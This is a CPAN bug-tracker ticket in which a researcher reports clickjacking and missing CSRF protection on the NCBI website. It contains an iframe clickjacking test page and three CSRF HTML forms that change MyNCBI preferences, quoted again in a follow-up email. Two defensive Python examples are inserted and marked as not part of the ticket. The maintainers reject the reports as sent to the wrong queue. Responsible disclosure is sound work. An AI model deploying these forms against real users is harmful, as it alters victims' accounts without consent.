
This queue is for tickets about the NCBI CPAN distribution.

Report information
The Basics
Id: 122870
Status: rejected
Priority: 0/
Queue: NCBI

People
Owner: Nobody in particular
Requestors: husnainiqbal02 [...] gmail.com
Cc:
AdminCc:

Bug Information
Severity: (no value)
Broken in: (no value)
Fixed in: (no value)



Subject: Vulnerable to click jacking
Date: Tue, 22 Aug 2017 22:06:13 +0500
To: bug-NCBI [...] rt.cpan.org
From: Husnain Iqbal <husnainiqbal02 [...] gmail.com>
Hello NCBI,

I am Husnain Iqbal, a security researcher. While I was going through your website I found your website is vulnerable to clickjacking. Here's some description about clickjacking.

Typically there is one type of attack - cross site request forgeries (CSRF) that can interact with functions on other websites. Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an X-Frame-Options header, which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

This vulnerability affects Web Server.

POC

Here are the steps to reproduce the vulnerability:

1. Open Notepad and paste the following code:

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="https://www.ncbi.nlm.nih.gov/account/settings/" width="1247" height="800"></iframe>
</body>
</html>

2. Save it as <anyname>.html, e.g. s.html.

3. And just simply open that.

As far as I know this data is enough to prove that your site is vulnerable to clickjacking. According to OWASP it's more than enough: https://www.owasp.org/index.php/Testing_for_Clickjacking_(OWASP-CS-004)

SOLUTION: https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Check this out. Here is the solution for that.

Thanks
Looking after your response
Regards:
Husnain
Download Untitled.png
image/png 110.1k

Message body is not shown because sender requested not to inline it.
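A defender-side check for the missing header the report above describes, as an added example that is not part of this ticket or of the NCBI distribution: it classifies a response's anti-framing headers (current browsers honour Content-Security-Policy's frame-ancestors directive over X-Frame-Options, so both are inspected) and shows the headers a server should add. The function names and header values are assumptions constructed for the example.

```python
"""Classify and repair a response's anti-framing headers.

Hypothetical helper (not the NCBI site's or distribution's code).
Header names are matched case-insensitively, as HTTP requires.
"""
import re


def framing_policy(headers: dict) -> str:
    """Return how third-party framing of this response is controlled.

    "blocked"     - no cross-site page can frame it (DENY, SAMEORIGIN,
                    or frame-ancestors limited to 'none'/'self')
    "allow-list"  - frame-ancestors permits only the listed origins
    "allow-from"  - obsolete X-Frame-Options ALLOW-FROM, ignored by
                    current browsers, so treat as unprotected
    "unprotected" - no anti-framing header at all (clickjacking risk)
    """
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    # frame-ancestors wins over X-Frame-Options when both are present.
    m = re.search(r"(?:^|;)\s*frame-ancestors\s+([^;]+)", csp, re.I)
    if m:
        sources = m.group(1).split()
        if all(s.lower() in ("'none'", "'self'") for s in sources):
            return "blocked"
        return "allow-list"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "blocked"
    if xfo.startswith("ALLOW-FROM"):
        return "allow-from"
    return "unprotected"


def add_antiframing_headers(headers: dict) -> dict:
    """Copy of the headers with both defences set, as the OWASP cheat sheet
    linked in the report recommends (X-Frame-Options for old browsers,
    frame-ancestors for current ones)."""
    fixed = dict(headers)
    fixed["X-Frame-Options"] = "DENY"
    csp = fixed.get("Content-Security-Policy", "")
    if "frame-ancestors" not in csp.lower():
        fixed["Content-Security-Policy"] = (csp + "; " if csp else "") + "frame-ancestors 'none'"
    return fixed
```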

Subject: NO CSRF PROTECTION ON PREFERENCES
Date: Tue, 22 Aug 2017 22:43:00 +0500
To: bug-NCBI [...] rt.cpan.org
From: Husnain Iqbal <husnainiqbal02 [...] gmail.com>
Hi Team,

I am a security researcher and I found your website vulnerable to this vulnerability.

Bug type: no CSRF
Vulnerable site: https://www.ncbi.nlm.nih.gov/myncbi/preferences/
Description:

I found that I can force anyone to change the account preferences like common preferences, PubMed preferences, PMC preferences etc. just because of the lack of CSRF. There is no CSRF protection so I can force any user from your site.

Here I am sending you some CSRF PoC for PubMed preferences.

CSRF PoC for Abstract supplement Data:

<html>
<body>
<form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST">
<input type="hidden" name="p&#36;site" value="myncbi" />
<input type="hidden" name="p&#36;rq" value="PAFAppLayout&#46;AppController&#46;Page&#46;myncbiApp&#95;Preferences&#46;myncbiAppPage&#95;Preferences&#58;saveShowAuthorAffiliation&#95;XHR" />
<input type="hidden" name="showAffiliation" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

CSRF PoC for Document Delivery preference:

<html>
<body>
<form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST">
<input type="hidden" name="p&#36;site" value="myncbi" />
<input type="hidden" name="p&#36;rq" value="PAFAppLayout&#46;AppController&#46;Page&#46;myncbiApp&#95;Preferences&#46;myncbiAppPage&#95;Preferences&#58;saveDocumentDelivery&#95;XHR" />
<input type="hidden" name="docDel" value="infoexpress" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

CSRF PoC for Author information preference:

<html>
<body>
<form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST">
<input type="hidden" name="p&#36;site" value="myncbi" />
<input type="hidden" name="p&#36;rq" value="PAFAppLayout&#46;AppController&#46;Page&#46;myncbiApp&#95;Preferences&#46;myncbiAppPage&#95;Preferences&#58;saveAbstractSupplemental&#95;XHR" />
<input type="hidden" name="suppInfoDisp" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Thanks. I hope you'll triage this. Waiting for your response.
Regards:
Husnain Iqbal
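Server-side CSRF protection for a preferences save like the one in the report above, as an added example that is not the NCBI site's code: a per-session token derived by HMAC from a server secret (so nothing extra is stored) plus an Origin/Referer check as a second, independent layer, as the OWASP cheat sheet recommends. The function names, session id, secret and header values are assumptions constructed for the example.

```python
"""CSRF check for a state-changing POST (hypothetical, not NCBI code)."""
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.ncbi.nlm.nih.gov"          # only origin whose forms are trusted
SERVER_SECRET = b"constructed-demo-secret-rotate-me"  # constructed; load from config in practice


def csrf_token(session_id: str) -> str:
    """Token to embed as a hidden field in every form rendered for this session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_is_trusted(session_id: str, form: dict, headers: dict) -> bool:
    """True only if the POST carries this session's token AND came from our origin.

    `form` holds the decoded POST fields, `headers` the request headers.
    A form auto-submitted from another site, like the PoCs in the report,
    carries no token and an Origin of the page hosting it, so it is refused.
    """
    expected = csrf_token(session_id).encode()
    supplied = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(expected, supplied):   # constant-time compare
        return False
    lower = {k.lower(): v for k, v in headers.items()}
    source = lower.get("origin") or lower.get("referer")
    if not source:
        return False                                   # cannot tell where it came from; refuse
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def handle_preferences_post(session_id: str, form: dict, headers: dict, prefs: dict):
    """Apply a showAffiliation change only when the request passes the CSRF check.

    Returns (preferences, http_status); untrusted requests leave prefs unchanged.
    """
    if not request_is_trusted(session_id, form, headers):
        return prefs, 403
    updated = dict(prefs)
    updated["showAffiliation"] = form.get("showAffiliation") == "true"
    return updated, 200
```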
Subject: Re: NO CSRF PROTECTION ON PREFERENCES
Date: Wed, 23 Aug 2017 18:02:13 +0500
To: bug-NCBI [...] rt.cpan.org
From: Husnain Iqbal <husnainiqbal02 [...] gmail.com>
Any updates?

On 22 August 2017 at 22:43, Husnain Iqbal <husnainiqbal02@gmail.com> wrote:

> Hi Team,
>
> I am a security researcher and I found your website vulnerable to this vulnerability.
>
> Bug type: no CSRF
> Vulnerable site: https://www.ncbi.nlm.nih.gov/myncbi/preferences/
> Description:
>
> I found that I can force anyone to change the account preferences like common preferences, PubMed preferences, PMC preferences etc. just because of the lack of CSRF. There is no CSRF protection so I can force any user from your site.
>
> Here I am sending you some CSRF PoC for PubMed preferences.
>
> CSRF PoC for Abstract supplement Data:
>
> <html>
> <body>
> <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST">
> <input type="hidden" name="p&#36;site" value="myncbi" />
> <input type="hidden" name="p&#36;rq" value="PAFAppLayout&#46;AppController&#46;Page&#46;myncbiApp&#95;Preferences&#46;myncbiAppPage&#95;Preferences&#58;saveShowAuthorAffiliation&#95;XHR" />
> <input type="hidden" name="showAffiliation" value="true" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
>
> CSRF PoC for Document Delivery preference:
>
> <html>
> <body>
> <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST">
> <input type="hidden" name="p&#36;site" value="myncbi" />
> <input type="hidden" name="p&#36;rq" value="PAFAppLayout&#46;AppController&#46;Page&#46;myncbiApp&#95;Preferences&#46;myncbiAppPage&#95;Preferences&#58;saveDocumentDelivery&#95;XHR" />
> <input type="hidden" name="docDel" value="infoexpress" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
>
> CSRF PoC for Author information preference:
>
> <html>
> <body>
> <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST">
> <input type="hidden" name="p&#36;site" value="myncbi" />
> <input type="hidden" name="p&#36;rq" value="PAFAppLayout&#46;AppController&#46;Page&#46;myncbiApp&#95;Preferences&#46;myncbiAppPage&#95;Preferences&#58;saveAbstractSupplemental&#95;XHR" />
> <input type="hidden" name="suppInfoDisp" value="true" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
>
> Thanks. I hope you'll triage this. Waiting for your response.
> Regards:
> Husnain Iqbal
You sent emails to the bug queue for a Perl language interface to the NCBI site. It has no affiliation with the organization; please address your concerns directly to https://www.ncbi.nlm.nih.gov.